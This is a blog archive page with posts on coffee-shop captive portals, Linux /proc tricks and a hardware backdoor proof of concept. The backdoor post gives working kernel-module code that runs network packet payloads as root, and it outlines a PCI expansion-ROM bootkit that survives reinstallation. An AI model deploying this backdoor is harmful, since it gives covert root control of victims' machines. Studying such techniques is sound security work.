Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?

wireless coffee

You pull out your laptop and type http://www.google.com into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DCHP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing among other things what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:

DHCP

Step 1: DHCP discovery. The DHCP client (us, 0.0.0.0 in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address 255.255.255.255). The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e (Wireshark shows IP address 192.168.5.1) answers our discovery broadcast.

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address (192.168.5.87) and know the IP address of our gateway router (192.168.5.1):

DHCP lease

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:

ARP

Before offering us IP address 192.168.5.87, the DHCP server (Portwell_17:ca:4) sends an ARP request for that address, saying "Who has 192.168.5.87. If that's you, respond with your MAC address". Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After getting assigned IP address 192.168.5.87, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address for our gateway router: 192.168.5.1. Our DHCP server happens to also be our gateway router and responds claiming the address.

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type http://www.google.com into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

DNS resolution

Looking back at the DHCP acknowledgement, as part of the lease we were given a domain name: sbx07338.cambrma.wayport.net. What our local DNS resolver decides to do with host www.google.com, since it potentially isn't fully-qualified, is append the domain name from the DHCP lease to it (eg www.google.com.sbx07338.cambrma.wayport.net in the first iteration) and try to resolve that. When the resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and then gives up and tries to resolve plain old www.google.com. This works, and we get back IP address 173.194.35.104. A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois 173.194.35.104
NetRange:       173.194.0.0 - 173.194.255.255
CIDR:           173.194.0.0/16
OriginAS:       AS15169
NetName:        GOOGLE
...
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
We complete a TCP handshake with ``173.194.35.104'' and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to http://nmd.sbx07338.cambrma.wayport.net/index.adp? MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87& vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196& UserAgent=&ProxyHost=:

TCP handshake + HTTP

Our MAC address and IP address are conveniently encoded in the redirect URL.

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router, 192.168.5.1, is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.


Let's dwell on this for a moment, because it's kind of amazing that the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of www.google.com, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use point-to-point encryption: HTTPS, SSH, your favorite IPSec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.


Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect (nmd.sbx07338.cambrma.wayport.ne) and make our request there:

DNS 98.98.48.198

nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get IP address 98.98.48.198. This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:

get to starbucks.yahoo.com

Step 4: Get to Google

Having agreed to the terms of service, 98.98.48.198 communicates to our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore -- our HTTP packets should be allowed out onto the Internet.

98.98.48.198 responds to our POST with a final HTTP 302 redirect, this time to starbucks.yahoo.com. We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to http://www.google.com.

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.

 ~jesstess

Monday Jan 10, 2011

Solving problems with proc

The Linux kernel exposes a wealth of information through the proc special filesystem. It's not hard to find an encyclopedic reference about proc. In this article I'll take a different approach: we'll see how proc tricks can solve a number of real-world problems. All of these tricks should work on a recent Linux kernel, though some will fail on older systems like RHEL version 4.

Almost all Linux systems will have the proc filesystem mounted at /proc. If you look inside this directory you'll see a ton of stuff:

keegan@lyle$ mount | grep ^proc
proc on /proc type proc (rw,noexec,nosuid,nodev)
keegan@lyle$ ls /proc
1      13     23     29672  462        cmdline      kcore         self
10411  13112  23842  29813  5          cpuinfo      keys          slabinfo
...
12934  15260  26317  4      bus        irq          partitions    zoneinfo
12938  15262  26349  413    cgroups    kallsyms     sched_debug

These directories and files don't exist anywhere on disk. Rather, the kernel generates the contents of /proc as you read it. proc is a great example of the UNIX "everything is a file" philosophy. Since the Linux kernel exposes its internal state as a set of ordinary files, you can build tools using basic shell scripting, or any other programming environment you like. You can also change kernel behavior by writing to certain files in /proc, though we won't discuss this further.

Each process has a directory in /proc, named by its numerical process identifier (PID). So for example, information about init (PID 1) is stored in /proc/1. There's also a symlink /proc/self, which each process sees as pointing to its own directory:

keegan@lyle$ ls -l /proc/self
lrwxrwxrwx 1 root root 64 Jan 6 13:22 /proc/self -> 13833

Here we see that 13833 was the PID of the ls process. Since ls has exited, the directory /proc/13883 will have already vanished, unless your system reused the PID for another process. The contents of /proc are constantly changing, even in response to your queries!

Back from the dead

It's happened to all of us. You hit the up-arrow one too many times and accidentally wiped out that really important disk image.

keegan@lyle$ rm hda.img

Time to think fast! Luckily you were still computing its checksum in another terminal. And UNIX systems won't actually delete a file on disk while the file is in use. Let's make sure our file stays "in use" by suspending md5sum with control-Z:

keegan@lyle$ md5sum hda.img
^Z
[1]+  Stopped                 md5sum hda.img

The proc filesystem contains links to a process's open files, under the fd subdirectory. We'll get the PID of md5sum and try to recover our file:

keegan@lyle$ jobs -l
[1]+ 14595 Stopped                 md5sum hda.img
keegan@lyle$ ls -l /proc/14595/fd/
total 0
lrwx------ 1 keegan keegan 64 Jan 6 15:05 0 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 1 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 2 -> /dev/pts/18
lr-x------ 1 keegan keegan 64 Jan 6 15:05 3 -> /home/keegan/hda.img (deleted)
keegan@lyle$ cp /proc/14595/fd/3 saved.img
keegan@lyle$ du -h saved.img
320G    saved.img

Disaster averted, thanks to proc. There's one big caveat: making a full byte-for-byte copy of the file could require a lot of time and free disk space. In theory this isn't necessary; the file still exists on disk, and we just need to make a new name for it (a hardlink). But the ln command and associated system calls have no way to name a deleted file. On FreeBSD we could use fsdb, but I'm not aware of a similar tool for Linux. Suggestions are welcome!

Redirect harder

Most UNIX tools can read from standard input, either by default or with a specified filename of "-". But sometimes we have to use a program which requires an explicitly named file. proc provides an elegant workaround for this flaw.

A UNIX process refers to its open files using integers called file descriptors. When we say "standard input", we really mean "file descriptor 0". So we can use /proc/self/fd/0 as an explicit name for standard input:

keegan@lyle$ cat crap-prog.py 
import sys
print file(sys.argv[1]).read()
keegan@lyle$ echo hello | python crap-prog.py 
IndexError: list index out of range
keegan@lyle$ echo hello | python crap-prog.py -
IOError: [Errno 2] No such file or directory: '-'
keegan@lyle$ echo hello | python crap-prog.py /proc/self/fd/0
hello

This also works for standard output and standard error, on file descriptors 1 and 2 respectively. This trick is useful enough that many distributions provide symlinks at /dev/stdin, etc.

There are a lot of possibilities for where /proc/self/fd/0 might point:

keegan@lyle$ ls -l /proc/self/fd/0
lrwx------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/pts/6
keegan@lyle$ ls -l /proc/self/fd/0 < /dev/null
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/null
keegan@lyle$ echo | ls -l /proc/self/fd/0
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> pipe:[9159930]

In the first case, stdin is the pseudo-terminal created by my screen session. In the second case it's redirected from a different file. In the third case, stdin is an anonymous pipe. The symlink target isn't a real filename, but proc provides the appropriate magic so that we can read the file anyway. The filesystem nodes for anonymous pipes live in the pipefs special filesystem — specialer than proc, because it can't even be mounted.

The phantom progress bar

Say we have some program which is slowly working its way through an input file. We'd like a progress bar, but we already launched the program, so it's too late for pv.

Alongside /proc/$PID/fd we have /proc/$PID/fdinfo, which will tell us (among other things) a process's current position within an open file. Let's use this to make a little script that will attach a progress bar to an existing process:

keegan@lyle$ cat phantom-progress.bash
#!/bin/bash
fd=/proc/$1/fd/$2
fdinfo=/proc/$1/fdinfo/$2
name=$(readlink $fd)
size=$(wc -c $fd | awk '{print $1}')
while [ -e $fd ]; do
  progress=$(cat $fdinfo | grep ^pos | awk '{print $2}')
  echo $((100*$progress / $size))
  sleep 1
done | dialog --gauge "Progress reading $name" 7 100

We pass the PID and a file descriptor as arguments. Let's test it:

keegan@lyle$ cat slow-reader.py 
import sys
import time
f = file(sys.argv[1], 'r')
while f.read(1024):
  time.sleep(0.01)
keegan@lyle$ python slow-reader.py bigfile &
[1] 18589
keegan@lyle$ ls -l /proc/18589/fd
total 0
lrwx------ 1 keegan keegan 64 Jan  6 16:40 0 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 1 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 2 -> /dev/pts/16
lr-x------ 1 keegan keegan 64 Jan  6 16:40 3 -> /home/keegan/bigfile
keegan@lyle$ ./phantom-progress.bash 18589 3

And you should see a nice curses progress bar, courtesy of dialog. Or replace dialog with gdialog and you'll get a GTK+ window.

Chasing plugins

A user comes to you with a problem: every so often, their instance of Enterprise FooServer will crash and burn. You read up on Enterprise FooServer and discover that it's a plugin-riddled behemoth, loading dozens of shared libraries at startup. Loading the wrong library could very well cause mysterious crashing.

The exact set of libraries loaded will depend on the user's config files, as well as environment variables like LD_PRELOAD and LD_LIBRARY_PATH. So you ask the user to start fooserver exactly as they normally do. You get the process's PID and dump its memory map:

keegan@lyle$ cat /proc/21637/maps
00400000-00401000 r-xp 00000000 fe:02 475918             /usr/bin/fooserver
00600000-00601000 rw-p 00000000 fe:02 475918             /usr/bin/fooserver
02519000-0253a000 rw-p 00000000 00:00 0                  [heap]
7ffa5d3c5000-7ffa5d3c6000 r-xp 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d3c6000-7ffa5d5c5000 ---p 00001000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c5000-7ffa5d5c6000 rw-p 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c6000-7ffa5d5c7000 r-xp 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d5c7000-7ffa5d7c6000 ---p 00001000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c6000-7ffa5d7c7000 rw-p 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c7000-7ffa5d91f000 r-xp 00000000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5d91f000-7ffa5db1e000 ---p 00158000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db1e000-7ffa5db22000 r--p 00157000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db22000-7ffa5db23000 rw-p 0015b000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db23000-7ffa5db28000 rw-p 00000000 00:00 0 
7ffa5db28000-7ffa5db2a000 r-xp 00000000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5db2a000-7ffa5dd2a000 ---p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2a000-7ffa5dd2b000 r--p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2b000-7ffa5dd2c000 rw-p 00003000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2c000-7ffa5dd4a000 r-xp 00000000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df26000-7ffa5df29000 rw-p 00000000 00:00 0 
7ffa5df46000-7ffa5df49000 rw-p 00000000 00:00 0 
7ffa5df49000-7ffa5df4a000 r--p 0001d000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4a000-7ffa5df4b000 rw-p 0001e000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4b000-7ffa5df4c000 rw-p 00000000 00:00 0 
7fffedc07000-7fffedc1c000 rw-p 00000000 00:00 0          [stack]
7fffedcdd000-7fffedcde000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

That's a serious red flag: fooserver is loading the bar plugin from FooServer version 1.2 and the quux plugin from FooServer version 1.3. If the versions aren't binary-compatible, that might explain the mysterious crashes. You can now hassle the user for their config files and try to fix the problem.

Just for fun, let's take a closer look at what the memory map means. Right away, we can recognize a memory address range (first column), a filename (last column), and file-like permission bits rwx. So each line indicates that the contents of a particular file are available to the process at a particular range of addresses with a particular set of permissions. For more details, see the proc manpage.

The executable itself is mapped twice: once for executing code, and once for reading and writing data. The same is true of the shared libraries. The flag p indicates a private mapping: changes to this memory area will not be shared with other processes, or saved to disk. We certainly don't want the global variables in a shared library to be shared by every process which loads that library. If you're wondering, as I was, why some library mappings have no access permissions, see this glibc source comment. There are also a number of "anonymous" mappings lacking filenames; these exist in memory only. An allocator like malloc can ask the kernel for such a mapping, then parcel out this storage as the application requests it.

The last two entries are special creatures which aim to reduce system call overhead. At boot time, the kernel will determine the fastest way to make a system call on your particular CPU model. It builds this instruction sequence into a little shared library in memory, and provides this virtual dynamic shared object (named vdso) for use by userspace code. Even so, the overhead of switching to the kernel context should be avoided when possible. Certain system calls such as gettimeofday are merely reading information maintained by the kernel. The kernel will store this information in the public virtual system call page (named vsyscall), so that these "system calls" can be implemented entirely in userspace.

Counting interruptions

We have a process which is taking a long time to run. How can we tell if it's CPU-bound or IO-bound?

When a process makes a system call, the kernel might let a different process run for a while before servicing the request. This voluntary context switch is especially likely if the system call requires waiting for some resource or event. If a process is only doing pure computation, it's not making any system calls. In that case, the kernel uses a hardware timer interrupt to eventually perform a nonvoluntary context switch.

The file /proc/$PID/status has fields labeled voluntary_ctxt_switches and nonvoluntary_ctxt_switches showing how many of each event have occurred. Let's try our slow reader process from before:

keegan@lyle$ python slow-reader.py bigfile &
[1] 15264
keegan@lyle$ watch -d -n 1 'cat /proc/15264/status | grep ctxt_switches'

You should see mostly voluntary context switches. Our program calls into the kernel in order to read or sleep, and the kernel can decide to let another process run for a while. We could use strace to see the individual calls. Now let's try a tight computational loop:

keegan@lyle$ cat tightloop.c
int main() {
  while (1) {
  }
}
keegan@lyle$ gcc -Wall -o tightloop tightloop.c
keegan@lyle$ ./tightloop &
[1] 30086
keegan@lyle$ watch -d -n 1 'cat /proc/30086/status | grep ctxt_switches'

You'll see exclusively nonvoluntary context switches. This program isn't making system calls; it just spins the CPU until the kernel decides to let someone else have a turn. Don't forget to kill this useless process!

Staying ahead of the OOM killer

The Linux memory subsystem has a nasty habit of making promises it can't keep. A userspace program can successfully allocate as much memory as it likes. The kernel will only look for free space in physical memory once the program actually writes to the addresses it allocated. And if the kernel can't find enough space, a component called the OOM killer will use an ad-hoc heuristic to choose a victim process and unceremoniously kill it.

Needless to say, this feature is controversial. The kernel has no reliable idea of who's actually responsible for consuming the machine's memory. The victim process may be totally innocent. You can disable memory overcommitting on your own machine, but there's inherent risk in breaking assumptions that processes make — even when those assumptions are harmful.

As a less drastic step, let's keep an eye on the OOM killer so we can predict where it might strike next. The victim process will be the process with the highest "OOM score", which we can read from /proc/$PID/oom_score:

keegan@lyle$ cat oom-scores.bash
#!/bin/bash
for procdir in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+'); do
  printf "%10d %6d %s\n" \
    "$(cat $procdir/oom_score)" \
    "$(basename $procdir)" \
    "$(cat $procdir/cmdline | tr '\0' ' ' | head -c 100)"
done 2>/dev/null | sort -nr | head -n 20

For each process we print the OOM score, the PID (obtained from the directory name) and the process's command line. proc provides string arrays in NULL-delimited format, which we convert using tr. It's important to suppress error output using 2>/dev/null because some of the processes found by find (including find itself) will no longer exist within the loop. Let's see the results:

keegan@lyle$ ./oom-scores.bash 
  13647872  15439 /usr/lib/chromium-browser/chromium-browser --type=plugin
   1516288  15430 /usr/lib/chromium-browser/chromium-browser --type=gpu-process
   1006592  13204 /usr/lib/nspluginwrapper/i386/linux/npviewer.bin --plugin
    687581  15264 /usr/lib/chromium-browser/chromium-browser --type=zygote
    445352  14323 /usr/lib/chromium-browser/chromium-browser --type=renderer
    444930  11255 /usr/lib/chromium-browser/chromium-browser --type=renderer
...

Unsurprisingly, my web browser and Flash plugin are prime targets for the OOM killer. But the rankings might change if some runaway process caused an actual out-of-memory condition. Let's (carefully!) run a program that will (slowly!) eat 500 MB of RAM:

keegan@lyle$ cat oomnomnom.c
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#define SIZE (10*1024*1024)

int main() {
  int i;
  for (i=0; i<50; i++) {
    void *m = mmap(NULL, SIZE, PROT_WRITE,
      MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    memset(m, 0x80, SIZE);
    sleep(1);
  }
  return 0;
}

On each loop iteration, we ask for 10 megabytes of memory as a private, anonymous (non-file-backed) mapping. We then write to this region, so that the kernel will have to allocate some physical RAM. Now we'll watch OOM scores and free memory as this program runs:

keegan@lyle$ gcc -Wall -o oomnomnom oomnomnom.c
keegan@lyle$ ./oomnomnom &
[1] 19697
keegan@lyle$ watch -d -n 1 './oom-scores.bash; echo; free -m'

You'll see oomnomnom climb to the top of the list.

So we've seen a few ways that proc can help us solve problems. Actually, we've only scratched the surface. Inside each process's directory you'll find information about resource limits, chroots, CPU affinity, page faults, and much more. What are your favorite proc tricks? Let us know in the comments!

~keegan

Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};
	
	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	
	kfree_skb(skb);
	return 0;
}
We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1
};

int init_module(void)
{
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
}
Let's build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.
This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

~rwbarton

Wednesday Oct 06, 2010

Anatomy of a Debian package

